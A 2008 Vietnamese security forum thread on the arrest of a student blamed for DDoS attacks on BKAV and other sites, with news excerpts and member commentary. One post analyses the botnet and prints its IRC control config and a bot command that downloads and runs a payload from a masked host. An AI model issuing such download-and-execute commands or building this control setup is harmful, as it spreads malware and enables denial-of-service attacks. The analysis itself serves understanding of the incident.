banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật Thủ phạm tấn công DDoS một số website VN bị bắt  XML
  [Question]   Thủ phạm tấn công DDoS một số website VN bị bắt 11/10/2008 11:33:56 (+0700) | #1 | 154801
thangdiablo
HVA Friend

Joined: 11/05/2003 17:31:58
Messages: 734
Offline
[Profile] [PM] [WWW]
Sau 20 giờ đồng hồ phối hợp, C15 Bộ Công an và Trung tâm an ninh mạng Đại học Bách Khoa Hà Nội đã xác định được kẻ thực hiện tấn công từ chối dịch vụ trong các ngày 5-9/10 là một học sinh trung học ở Quảng Nam.


Sáng nay, thủ phạm đã bị bắt giữ tại nhà cùng tang vật là chiếc máy tính cá nhân được sử dụng để thực hiện các vụ tấn công.


Từ 9h ngày chủ nhật (5/10), người sử dụng không thể truy cập một số trang web tại Việt Nam. Trong hai ngày tiếp theo, các website 5giay.vn và nhatnghe.com liên tục bị DDoS, sau đó là đến bkav.com.vn vào 8/10.

Kết quả điều tra của C15 và BKIS cho thấy kẻ thực hiện cuộc tấn công (cơ quan điều tra chưa tiết lộ danh tính) đã huy động bạn bè cài đặt virus tại các cửa hàng game, Internet công cộng. Từ đây, virus được phát tán qua USB. Bằng cách này, thủ phạm đã tạo dựng được một mạng botnet với khoảng 1.000 máy tính ma và biến nó thành công cụ DDoS.

"Gần đây, các vụ vi phạm trên mạng có dấu hiệu xuất hiện trở lại", thượng tá Trần Văn Hòa, Trưởng phòng cảnh sát phòng chống tội phạm công nghệ cao thuộc C15, Bộ Công an, nói. "Tháng 11 tới, Quốc hội sẽ thông qua dự thảo Bộ Luật hình sự sửa đổi. Tội cố ý phát tán chương trình tin học có tính năng gây hại, điều khiển bất hợp pháp máy tính, mạng máy tính, làm mất khả năng hoạt động và gây hậu quả nghiêm trọng sẽ bị phạt tiền từ 20 triệu đồng đến 200 triệu đồng hoặc bị phạt tù từ 1 đến 5 năm".

Còn ông Vũ Ngọc Sơn, Trưởng phòng virus của BKIS, nhận xét vụ tấn công này xuất phát từ một hành động thiếu hiểu biết và khẳng định việc lần ra thủ phạm không khó.

"Trong trường hợp bị tấn công từ chối dịch vụ DDoS, trước tiên doanh nghiệp cần thiết lập chế độ phòng vệ khẩn cấp, giúp tất cả truy nhập bình thường của người sử dụng vào website sẽ không gặp vấn đề gì, còn những truy nhập có dấu hiệu bất thường lập tức bị cô lập. Ngay sau đó, doanh nghiệp cần nhanh chóng thông báo cho cơ quan điều tra và đơn vị chuyên môn để truy tìm thủ phạm", ông Nguyễn Tử Quảng, Giám đốc BKIS, khuyến cáo.

Lê Nguyên

http://vnexpress.net/GL/Vi-tinh/Hacker-Virus/2008/10/3BA0752F/
Hãy sống có Tuệ Giác.
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 11/10/2008 12:26:17 (+0700) | #2 | 154812
[Avatar]
hackerbinhphuoc
Member

[Minus]    0    [Plus]
Joined: 16/01/2004 09:45:41
Messages: 22
Offline
[Profile] [PM]
em có viết một bài tìm hiểu về vụ việc này:
Kẻ tấn công vừa bị bắt theo thông tin trên báo là một học sinh trung học ở Quảng Nam. Vậy làm sao một học sinh trung học có thể huy động nhiều máy tính để tấn công được BKAV.com.vn, chúng ta sẽ cùng nhau phân tích:

Nhận thông tin:

Vào ngày chủ nhật 5/10/2008 khi đang ở nhà, tôi truy cập vào trang bkav.com.vn để down phần mềm diệt virus về diệt virus cho máy laptop người thân, tuy nhiên tôi không thể nào truy cập vào trang bkav.com.vn. Một lát sau tôi liên tục nhận được thông tin website http://www.bkav.com.vn bị tấn công botnet, đến chiều hôm đó tôi đăng tin lên trang http://vietnamsecurity.googlepages.com, ngày hôm sau các báo bắt đầu đăng tin và phỏng vấn BKIS về vụ việc tuy nhiên bkis đã phủ nhận tất cả thông tin và đính chính là vụ việc trên chỉ là hoạt động nâng cấp thường nhật của BKAV.

Sau đây là những hình ảnh chụp được ngày 5/10:

http://img360.imageshack.us/img360/3162/bkavek1.jpg




Tuy nhiên, tôi vẫn tiếp tục nhận được thông tin bkav bị ddos, website bkav.com.vn tiếp tục hoạt động chập chờn và thậm chí có lúc không truy cập vào được trong thời gian dài! đến lúc này thì thông báo việc nâng cấp của bkav không còn hợp lý nữa, nó củng cố thêm thông tin cho là bkav.com.vn bị tấn công botnet. Sau đây là những hình ảnh cập nhật sau đó:

http://vietnamsecurity.googlepages.com/bkav5.JPG




http://vietnamsecurity.googlepages.com/bkav6.JPG




http://vietnamsecurity.googlepages.com/bkav7.JPG





Đồng thời vào 17h ngày 7/10 tôi lại nhận được những hình ảnh chụp màn hình được cho là hình ảnh tấn công trang bkav.com.vn và một file có tên là BKAV.exe ( được cho là file tấn công bkav.exe)

http://vietnamsecurity.googlepages.com/bkis1.JPG




http://vietnamsecurity.googlepages.com/bkis2.JPG




http://vietnamsecurity.googlepages.com/bkis3.jpg







Đồng thời trên mạng cũng xuất hiện các thông tin cho rằng có một người đã dùng các chèn mã độc vào các bản crack BKAV pro, các bản auto game và chèn iframe vào các website lớn để từ đó xây dựng mạng botnet để tấn công http://www.bkav.com.vn

Tìm thông tin

Sau khi nhận thông tin và phản hồi từ các báo chí và bạn bè, tôi tiến hành điều tra sự việc!

Tôi tìm bắt tìm thông tin về các hacker hay sử dụng botnet, các loại botnet phổ biến ở Việt Nam, tìm các các diễn đàn lớn đã bị tấn công trong thời gian qua để tìm manh mối! đồng thời nhờ người có kinh nghiệm tiến hành thử nghiệm và phân tích cơ chế hoạt động của của file BKAV.exe.

Kết quả là tôi cũng tìm được một số manh mối:

Sau khi phân tích file BKAV.exe cho thấy đây là một loại virus nội, đã được đưa vào danh sách virus của BKAV, thông tin thêm:

http://bkav.com.vn/thong_tin_virus/13/08/2008/3/1755/

đồng thời tìm kiếm trên các forum lớn, tôi tìm được các thông tin sau:

http://vietnamsecurity.googlepages.com/trojan.jpg







đây là đoạn mã chèn file vào website, cụ thể ở đây là 4gamevn.com, cơ chế của nó là tự download file trojan.exe về máy người dùng và thực thi. Thông tin này càng lý giải cho việc làm sao một học sinh trung học có thể xây dựng một mạng lưới bot net với tầm hơn 100 ngàn victim!

Sau khi download file trojan.exe về, tôi tíên hành dịch ngược và may mắn có được email của người viết con trojan này! Tuy nhiên vẫn chưa có được chứng cứ cụ thể về vụ việc tấn công BKAV. Từ địa chỉ email đó tôi bắt đầu tìm được những thông tin cá nhân của kẻ tấn công, hình ảnh, các forum người này tham gia! nó có email là: Linh_XXX@yahoo.com , từ đó tôi vào blog, đồng thời cũng biết được níck trên mạng của kẻ đó là LLY. . ., một tay chơi botnet còn khá nhỏ tuổi ở Việt Nam, tôi bắt đầu tìm hiểu cách xây dựng mạng Botnet của Lly. . .

Câu chuyện hé mở:

Qua tìm hiểu cho thấy kẻ tấn công còn trẻ tuy nhiên có sự nghiên cứu về botnet, cc chùa, và biết lập trình!

Lly… đã viết cho mình một chương trình botnet mới dựa trên nền tảng mIRC để điều khiển các victim. Sau đó lly… đã cài con virus này vào các chương trình chơi auto game, chương trình crack Bkpro (chưa tìm ra phiên bản để kiểm chứng), đồng thời dựa vào các mối quan hệ với các tay chơi botnet khác kiếm shell trên các diễn đàn lớn, đông lựơt truy cập để cài iframe vào các diễn đàn đó, thậm chí có thể lly đã cài vào chính diễn đàn về âm nhạc và giải trí mà lly đang quản lý!

Sau khi victim bị nhiễm vào máy sẽ thự động nhận lệnh từ một file có trên website của kẻ tấn công: http://www.xxx.net/server/php nội dung của file này có dạng như sau:

http://vietnamsecurity.googlepages.com/server.JPG




[Server] server=irc. port=6667 chan=#zz ver=3 IP=58.xxx.xxx.xxx

với các thông số:

Server: đây là server irc để victim connect vào! vậy tại sao ở đây chỉ là irc? Đó chính là vì kẻ tấn công muốn bình thường victim không thể connect tới server được, khi nào kẻ tấn công chỉnh lại file server.php thì victim mới connect vào!




Port:6667 là port mặt định của IRC

Chan: đây là room mà kẻ tấn công sẽ tạo ra để điều khiển các victim

Ver=3: là version của virus botnet này, có nó chức năng tự động cập nhật khi phiên bản trong máy victim cũ!

IP=58.xxx.xxx.xxx: đây là ip của kẻ tấn công

Sau khi nhận lệnh từ file server.php, máy của vitim sẽ tự động connect tới server IRC.nhac…..vn và join vào room ZZ

Kẻ tấn công đã khéo léo viết chương trình botnet nhận lệnh từ mIRC

Cấu trúc câu lệnh như sau:

!lly… download http://www.xxx.vn/bkav.exe c:\a.exe 1

Ý nghĩa của nó là sẽ tự động download file bkav.exe từ server về máy victim và tự động thực thi! File bkav.exe có nhiệm vụ là ghi vào regstry những biến để liên tục ping đến server bkav.exe gây ra cuộc tấn công từ chối dịch vụ!




vậy khi cần thực hiện cuộc tấn công, lly.. chỉ cần connect vào mạng mIRC và gõ vài câu lệnh!

Note: Bạn hackerbinhphuoc, websever mà bạn hosting website http://vietnamsecurity.googlepages.com và các file image của bạn hạn chế băng thông sử dụng một cách khăt khe. Vì vây rất nhiều lúc các hình ảnh minh họa bài viết của bạn không hiên lên HVA forum được, hay hiện rất chậm. Ngoài ra khuôn khổ các image quá lớn nên khi load lên khung hình (table) HVA forum bị broken nghiêm trọng, làm khó đọc bài viết. Tôi đã save chúng, sửa lại và hosting chúng trên webserver của tôi. Khi nào có nơi hosting tốt, bạn có thể thay đổi lại..PXMMRF
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 11/10/2008 21:27:11 (+0700) | #3 | 154838
[Avatar]
Phuongdong
Advisor

Joined: 10/03/2003 17:46:03
Messages: 323
Offline
[Profile] [PM]

hackerbinhphuoc wrote:

Nhận thông tin:

Vào ngày chủ nhật 5/10/2008 khi đang ở nhà, tôi truy cập vào trang bkav.com.vn để down phần mềm diệt virus về diệt virus cho máy laptop người thân, tuy nhiên tôi không thể nào truy cập vào trang bkav.com.vn. Một lát sau tôi liên tục nhận được thông tin website http://www.bkav.com.vn bị tấn công botnet, đến chiều hôm đó tôi đăng tin lên trang http://vietnamsecurity.googlepages.com, ngày hôm sau các báo bắt đầu đăng tin và phỏng vấn BKIS về vụ việc tuy nhiên bkis đã phủ nhận tất cả thông tin và đính chính là vụ việc trên chỉ là hoạt động nâng cấp thường nhật của BKAV.
 

Bài viết rất hay và rõ ràng về các chi tiết liên quan đến kỹ thuật ngoại trừ một chi tiết không giống lắm smilie
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 11/10/2008 22:05:54 (+0700) | #4 | 154845
cocondihoc
Member

[Minus]    0    [Plus]
Joined: 27/04/2008 13:15:35
Messages: 61
Offline
[Profile] [PM]
Còn nhớ ông Sơn BKIS nói là "nâng cấp server" chứ đâu phỉ bị DDoS. Vậy mà bkav.com.vn lại nằm trong danh sách những site bị tấn công. Hay quá ha! Cu cậu học sinh kia thật dại quá, dám đụng đến các chuyên gia an ninh mạng. smilie
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 12/10/2008 00:28:34 (+0700) | #5 | 154861
[Avatar]
louisnguyen27
Member

[Minus]    0    [Plus]
Joined: 12/08/2008 18:04:41
Messages: 321
Offline
[Profile] [PM]
Theo VTC news: http://www.vtc.vn/congnghe/website-trung-tam-an-ninh-mang-bkis-bi-hack/193325/index.htm
Tuy nhiên, ông Vũ Ngọc Sơn, Trưởng phòng virus của Bkis cho biết: Bkis đã chọn ngày chủ nhật (5/10) để nâng cấp hệ thống và theo dự kiến chỉ mất khoảng 1-2 tiếng nên không đăng thông báo trên website. Nhưng do trục trặc nên quá trình nâng cấp đã kéo dài hơn kế hoạch ban đầu. 


Theo Vnexpress: http://www.vnexpress.net/GL/Vi-tinh/Hacker-Virus/2008/10/3BA0752F/
Còn ông Vũ Ngọc Sơn, Trưởng phòng virus của BKIS, nhận xét vụ tấn công này xuất phát từ một hành động thiếu hiểu biết và khẳng định việc lần ra thủ phạm không khó. 


Lưỡi không xương nhiều đường lắt léo, Miệng không vành miệng méo lung tung...

cocondihoc wrote:
Còn nhớ ông Sơn BKIS nói là "nâng cấp server" chứ đâu phỉ bị DDoS. Vậy mà bkav.com.vn lại nằm trong danh sách những site bị tấn công. Hay quá ha! Cu cậu học sinh kia thật dại quá, dám đụng đến các chuyên gia an ninh mạng. smilie  


Sai bét: nếu theo những lời nhận xét của ông Vũ Ngọc Sơn nói trên thì cu cậu học sinh này là nhân viên trong cơ quan an ninh mạng BKIS và đệ tử ruột của bác Nguyễn Tử Quảng.
Logic như sau:
Website down ---> Vũ Ngọc Sơn nói là BKIS bảo trì.
Người làm website down ---> Nhân viên bảo trì của BKIS.
Nhân viên bảo trì của BKIS ---> đệ tử ruột của bác Quảng.
Suy ra:
Cu cậu làm website down ---> đệ tử ruột của bác Quảng. Hì hì.
Trước đây mình rất tự hào về dòng họ Nguyễn Tử có một người như bác Quảng. Nhưng càng về sau mình càng thất vọng bởi những tuyên bố và cách làm việc của BKIS: không trung thực.
Q+SBtZW1iZXIgb2YgSFZ+B
Back to Linux soon!!!
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 12/10/2008 00:50:14 (+0700) | #6 | 154864
mediocre-ninja
Member

[Minus]    0    [Plus]
Joined: 06/10/2008 17:56:32
Messages: 26
Offline
[Profile] [PM] [MSN]
Chi tiết về IRC có vẻ thú vị đấy smilie .

Còn mấy cái kia thì xưa quá rồi smilie ,
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 12/10/2008 01:56:04 (+0700) | #7 | 154878
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]
Tôi nhắc các bạn vipbk09 và rename cẩn thân trong viêc post bài.

Chú ý là HVA không bao giờ chủ trương hack hay DDoS vào bất cứ website-server nào.

Nếu có cá nhân nào đó, dù anh/chi ta đã, đang đăng ký làm thanh viên HVA, mà làm các việc bất hơp pháp nói trên, thì họ phải chịu hoàn toàn trách nhiêm cá nhân.

Ngoài ra xin bạn "hackerbinhphuoc" chú ý thu nhỏ kích thước các file ảnh (hiện đang hosting trên http://vietnamsecurity.googlepages.com/), để khi load lên HVA forum, khung hình của forum không bị broken.
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 12/10/2008 06:07:48 (+0700) | #8 | 154905
[Avatar]
xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!] [MSN]
Nếu chú nhóc đó không dại mà khoe trên forum nào đó kia ( cũng như dại tới mức quăng cái mail vào Bot ) là cậu ta đang "chọi đá" Bkav.com.vn thì có lẽ với bản chất cuộc tấn công thông qua một mạng botnet và dùng một IRC làm controller thì không lý gì BKIS tìm ra được cậu ta.Việc tìm ra thủ phạm có lẽ khó hơn cả việc dò ra thủ phạm x-flash hồi xưa.
Hơn nữa cậu nhóc chỉ thực hiện DDoS bằng mô thức ping tức chỉ dùng ICMP packet là chính, vậy mà cả một cái "Trung tâm an ninh mạng" tự xưng lại khôngthể cản lọc được sao ?
"Người lớn" mang "trẻ con" ra làm trò để phỉnh lừa thiên hạ quả chẳng ra thể thống gì
Để có ngày bị "người lớn thật sự" đập thì chăng họ mới hết làm bậy.

Bức xúc quá hơi nóng, quanta hay FaL cho anh xin gáo nước smilie
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 12/10/2008 06:09:51 (+0700) | #9 | 154906
[Avatar]
Ky0shir0
Member

[Minus]    0    [Plus]
Joined: 20/08/2008 19:06:44
Messages: 298
Offline
[Profile] [PM]

vipbk09 wrote:

PXMMRF wrote:
Tôi nhắc các bạn vipbk09 và rename cẩn thân trong viêc post bài.

Chú ý là HVA không bao giờ chủ trương hack hay DDoS vào bất cứ website-server nào.

 


Bác nóng quá xá rồi smilie

Em có hô hào hắc hiếc gì đâu. Em chỉ nói : nên ném gạch vào những nơi đáng ném hơn là mạo hiểm đi hắc những nơi đó smilie  

Sao nghĩ hẹp vậy bạn? Quốc có quốc pháp, gia có gia qui.
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 12/10/2008 10:23:43 (+0700) | #10 | 154928
[Avatar]
K4i
Moderator

Joined: 18/04/2006 09:32:13
Messages: 635
Location: Underground
Offline
[Profile] [PM]

xnohat wrote:
Nếu chú nhóc đó không dại mà khoe trên forum nào đó kia ( cũng như dại tới mức quăng cái mail vào Bot ) là cậu ta đang "chọi đá" Bkav.com.vn thì có lẽ với bản chất cuộc tấn công thông qua một mạng botnet và dùng một IRC làm controller thì không lý gì BKIS tìm ra được cậu ta.Việc tìm ra thủ phạm có lẽ khó hơn cả việc dò ra thủ phạm x-flash hồi xưa.
Hơn nữa cậu nhóc chỉ thực hiện DDoS bằng mô thức ping tức chỉ dùng ICMP packet là chính, vậy mà cả một cái "Trung tâm an ninh mạng" tự xưng lại khôngthể cản lọc được sao ?
"Người lớn" mang "trẻ con" ra làm trò để phỉnh lừa thiên hạ quả chẳng ra thể thống gì
Để có ngày bị "người lớn thật sự" đập thì chăng họ mới hết làm bậy.

Bức xúc quá hơi nóng, quanta hay FaL cho anh xin gáo nước smilie 


Hôm nay được một bác bên đấy trong lúc nói về DDoS có đề cập đến vụ BKIS đúng là bị tấn công DDoS mấy hôm rồi. Chỉ thấy kì lạ là tại sao hệ thống của BKIS hầm hố như thế (toàn đồ của Cisco và Microsoft) mà một cái mạng Botnet tầm 1000 máy chơi một lúc là đơ smilie. Nếu chưa xét đến thông tin của bác xnohat là chỉ ping thôi nhá.

PS: - Thực ra cái thông tin số zombie trong mạng botnet của thằng ku em vừa "chọi đá" vào BKAV ở các báo là rất lẫn lộn, có báo bảo tầm 1000, báo thì bảo hơn trăm nghìn. Thật không hiểu số liệu nào là chính xác nữa.

<ngoài lề>
Cũng trong lúc đề cập đến DoS, để minh họa cho định nghĩa từ chối dịch vụ, có ví dụ thế này: có mấy con máy chủ của công ty nọ đặt ở VDC. Bên đấy ra vào tự do, có thằng hacker nào đó, ghét mấy chú admin của công ty nọ liền lên trên VDC. Mình nghe đến đây, tự nghĩ là chắc rút điện cho mấy con máy chủ nghỉ chạy thôi, ai dè có bác phát biểu là thằng kia lấy cái bua, quai mấy phát vào mấy con máy chủ. Đấy người ta gọi là tấn công từ chối dịch vụ.
</ngoài lề>





Sống là để không chết chứ không phải để trở thành anh hùng
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 13/10/2008 02:29:56 (+0700) | #11 | 154989
[Avatar]
vikjava
Elite Member

[Minus]    0    [Plus]
Joined: 28/06/2004 02:32:38
Messages: 926
Location: NQN
Offline
[Profile] [PM]
vậy attacker bị bắt là do để lại địa chỉ email ah. Có bác nào phân tích lại các bước để điều tra kô nhỉ. Hỏng hiều sao hay vậy
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 13/10/2008 02:48:50 (+0700) | #12 | 154993
[Avatar]
hackerbinhphuoc
Member

[Minus]    0    [Plus]
Joined: 16/01/2004 09:45:41
Messages: 22
Offline
[Profile] [PM]
trên đó hoàn toàn là suy luận của cá nhân không liên quan gì đến thông tin BKIS bắt kẻ tấn công DDOS cả!
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 13/10/2008 05:48:34 (+0700) | #13 | 155006
mediocre-ninja
Member

[Minus]    0    [Plus]
Joined: 06/10/2008 17:56:32
Messages: 26
Offline
[Profile] [PM] [MSN]
vậy attacker bị bắt là do để lại địa chỉ email ah. Có bác nào phân tích lại các bước để điều tra kô nhỉ. Hỏng hiều sao hay vậy 

Địa chỉ email trong mã nguồn (AutoIt) , dịch ngược là thấy thôi, đúng là tay này ẩu thật.

Theo tớ đoán là điều tra sau khi có email là : search Internet smilie , rồi collect infor và cử người đến địa phương xác nhận :-D

[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 13/10/2008 06:43:36 (+0700) | #14 | 155011
vipbk09
Member

[Minus]    0    [Plus]
Joined: 15/09/2007 11:15:26
Messages: 77
Offline
[Profile] [PM]
Bác Quảng quả là xuất chúng. BKIS quả là trung tâm an ninh mạng hàng đầu smilie

Họ giăng bẫy để bắt thủ phạm đấy các bác http://www.thanhnien.com.vn/News/Pages/200841/20081010232252.aspx

MK, sao thằng này có da mặt dày thế không biết smilie
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 13/10/2008 07:27:37 (+0700) | #15 | 155017
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

Ky0shir0 wrote:
@vipbk09: vì BKIS mà bạn bị warn, có đáng không? Theo tôi là không đáng chút nào! 


Các bạn không đoc kỹ nôi dung các post. Không ai bênh BKIS cả, đăc biệt khi họ sai, hay phát ngôn thiếu chuẩn mực.

Tôi nhắc vipro123rename là cần chú ý khi viết bài. Cách viết như trong hai post trên có thể làm cho người ngoài nghĩ là nhiều thành viên HVA tham gia vào việc DoS vào BKIS, thâm chí cho rằng HVA có chủ trương như vậy.

(Đây tôi cho hiện lại ra hai post liên quan để xem lại)

Đó cũng là lý do mà bạn Fal đã warn vipro123

Note: (Còn bạn vipbk09 thì tôi muốn nhắc là không nên viết để hô hào một hành động thô bạo như vây với bất cứ ai, kể cả BKIS)


vipbk09 wrote:
Đừng hack BKIS - Hãy ném gạch vào mặt chúng.  

The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 13/10/2008 07:31:13 (+0700) | #16 | 155018
[Avatar]
quanta
Moderator

Joined: 28/07/2006 14:44:21
Messages: 7265
Location: $ locate `whoami`
Offline
[Profile] [PM]

PXMMRF wrote:

Tôi nhắc vipbk09rename là cần chú ý khi viết bài. Cách viết như trong hai post trên có thể làm cho người ngoài nghĩ là nhiều thành viên HVA tham gia vào việc DoS vào BKIS, thâm chí cho rằng HVA có chủ trương như vậy.

Đó cũng là lý do mà bạn Fal đã warn vipbk09
 

Cũng vì lý do này, mà tôi tặng bạn rename 1 "sẹo".
Let's build on a great foundation!
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 13/10/2008 10:10:55 (+0700) | #17 | 155032
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

seraphpl wrote:
Sao bài em bị liệt vào hàng ngũ vi phạm nội quy của diễn đàn vậy mấy anh?
Em post bài với một tinh thần vô cùng hướng thiện mà. 


Ờ, tôi không "ẩn" bài viết của bạn. Người "ẩn" bài viết của bạn chắc có lý do là: Họ không muốn nôi dung một bài phạm quy (bài của tendangnhap) bị quote lại toàn bộ trong một post khác. Như vậy việc "ẩn" sẽ mất tác dụng.

Lân sau bạn chỉ nên quote lại một phần của bài viết mà bạn thấy phạm quy.
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 13/10/2008 10:23:28 (+0700) | #18 | 155035
seraphpl
Member

[Minus]    0    [Plus]
Joined: 04/12/2006 19:52:12
Messages: 97
Location: xxx
Offline
[Profile] [PM] [WWW] [Yahoo!] [MSN] [ICQ]

PXMMRF wrote:

seraphpl wrote:
Sao bài em bị liệt vào hàng ngũ vi phạm nội quy của diễn đàn vậy mấy anh?
Em post bài với một tinh thần vô cùng hướng thiện mà. 


Ờ, tôi không "ẩn" bài viết của bạn. Người "ẩn" bài viết của bạn chắc có lý do là: Họ không muốn nôi dung một bài phạm quy (bài của tendangnhap) bị quote lại toàn bộ trong một post khác. Như vậy việc "ẩn" sẽ mất tác dụng.

Lân sau bạn chỉ nên quote lại một phần của bài viết mà bạn thấy phạm quy. 

àh! Bây giờ thì cháu đã hiểu, xin cám ơn bác PXMMRF.
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 13/10/2008 10:28:03 (+0700) | #19 | 155036
[Avatar]
Phuongdong
Advisor

Joined: 10/03/2003 17:46:03
Messages: 323
Offline
[Profile] [PM]

vipbk09 wrote:
Bác Quảng quả là xuất chúng. BKIS quả là trung tâm an ninh mạng hàng đầu smilie

Họ giăng bẫy để bắt thủ phạm đấy các bác http://www.thanhnien.com.vn/News/Pages/200841/20081010232252.aspx

MK, sao thằng này có da mặt dày thế không biết smilie  

http://vnexpress.net/GL/Vi-tinh/Hacker-Virus/2008/10/3BA07259/

Chết thật, cứ đọc báo thế này mình chắc bỏ nghề về đi buôn hạt giống rau cải bán chẳng mấy chốc mà giầu. Như này nó gọi là bia kèm mực ở những năm 80 đầu thập kỷ
1- Nhận định

ông Vũ Ngọc Sơn - Trưởng phòng virus an ninh mạng wrote:

Chủ nhật (5/10), trung tâm này đã tiến hành nâng cấp hệ thống và theo dự kiến chỉ mất khoảng 1-2 tiếng nên không đăng thông báo trên website. Nhưng do trục trặc nên quá trình nâng cấp đã kéo dài hơn kế hoạch ban đầu.
 

ông Nguyễn Tử Quảng, Giám đốc BKIS wrote:

BKIS đã xác định sớm muộn tin tặc cũng sẽ đánh BKIS để "thể hiện đẳng cấp" và đã quyết định giăng bẫy với tin tặc này.
 


2- Tấn công và phòng thủ

http://vietnamsecurity.googlepages.com/bkav wrote:

tự động thực thi! File bkav.exe có nhiệm vụ là ghi vào regstry những biến để liên tục ping đến server bkav.exe gây ra cuộc tấn công từ chối dịch vụ!
Bằng cách này, thủ phạm đã tạo dựng được một mạng botnet với khoảng 1.000 máy tính ma và biến nó thành công cụ DDoS.
 

ông Nguyễn Tử Quảng, Giám đốc BKIS wrote:

việc truy cập vào bkav.com.vn gặp trục trặc trong ngày 8.10 là do BKIS đã dựng lên một hệ thống phòng thủ để đón lõng tin tặc. "Với cơ chế này, khi ai đó truy cập vào website của BKIS nếu như refresh liên tục sẽ bị chặn IP, đây là giải pháp tình thế chúng tôi phải thực hiện để ngăn chặn tấn công vì việc refresh liên tục sẽ được hiểu như một hành động bất thường và rất có thể là việc tấn công của cơ chế DDOS"
 


3- Truy lùng dấu vết

ông Vũ Ngọc Sơn - Trưởng phòng virus an ninh mạng wrote:

Tôi sẽ tiến hành kiểm tra xem thông tin này có chính xác không. Nếu đúng, chúng tôi sẽ phối hợp với C15 Bộ Công an để điều tra sự việc. Cũng như những vụ việc trước đây, việc tìm ra thủ phạm không phải là khó", ông Sơn khẳng định.
 

Ông Quảng cho biết wrote:

sau khi thông tin website của BKIS cũng bị DDOS tê liệt trong 5.10 và 8.10 được lan truyền, tại một diễn đàn của giới hacker, P. (tên của thủ phạm), đã nhận mình là tác giả của các vụ tấn công trên
 


4- Kết thúc như phim
Sau 20 giờ đồng hồ phối hợp và quyết liệt điều tra, Phòng Phòng chống tội phạm công nghệ cao (C15 - Bộ Công an) và Trung tâm An ninh mạng BKIS đã xác định được thủ phạm.

5- Nhận định của xã hội : bị bắt vì thiếu hiểu biết

http://vietnamsecurity.googlepages.com/bkav wrote:

Sau khi download file trojan.exe về, tôi tíên hành dịch ngược và may mắn có được email của người viết con trojan này! Tuy nhiên vẫn chưa có được chứng cứ cụ thể về vụ việc tấn công BKAV. Từ địa chỉ email đó tôi bắt đầu tìm được những thông tin cá nhân của kẻ tấn công, hình ảnh, các forum người này tham gia! nó có email là: Linh_XXX@yahoo.com , từ đó tôi vào blog, đồng thời cũng biết được níck trên mạng của kẻ đó là LLY. . .
 


Chỉ biết nói câu Đan Mạch




[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 13/10/2008 11:33:29 (+0700) | #20 | 155044
nguoi_my_tram_lang
Member

[Minus]    0    [Plus]
Joined: 09/10/2007 12:32:18
Messages: 10
Location: HOA THỊNH ĐỐN
Offline
[Profile] [PM]


Mấy bác ở Bkít lúc thì nói là nâng cấp server sau này quay sang nói là giăng bẫy smilie ... trời trời sao mà khó chấp nhận quá. Mấy bác dũng cảm thì làm cái gì đó đàng hoàng coi nào.

Chỉ khổ thân cậu bé kia thôi để lộ quá nhiều hành tung thế này thì gọi là " Ếch trong bụi nhảy ra " chứ. Không bit h ra sao roài.


[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 14/10/2008 01:13:51 (+0700) | #21 | 155100
[Avatar]
vikjava
Elite Member

[Minus]    0    [Plus]
Joined: 28/06/2004 02:32:38
Messages: 926
Location: NQN
Offline
[Profile] [PM]
smilie sao các bác không phân tích làm thế nào bkav tìm ra thủ phạm,đi sâu phân tích chi tiết cho a em mở rộng tầm nhin.
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 14/10/2008 01:32:45 (+0700) | #22 | 155104
[Avatar]
louisnguyen27
Member

[Minus]    0    [Plus]
Joined: 12/08/2008 18:04:41
Messages: 321
Offline
[Profile] [PM]

vikjava wrote:
smilie sao các bác không phân tích làm thế nào bkav tìm ra thủ phạm,đi sâu phân tích chi tiết cho a em mở rộng tầm nhin. 

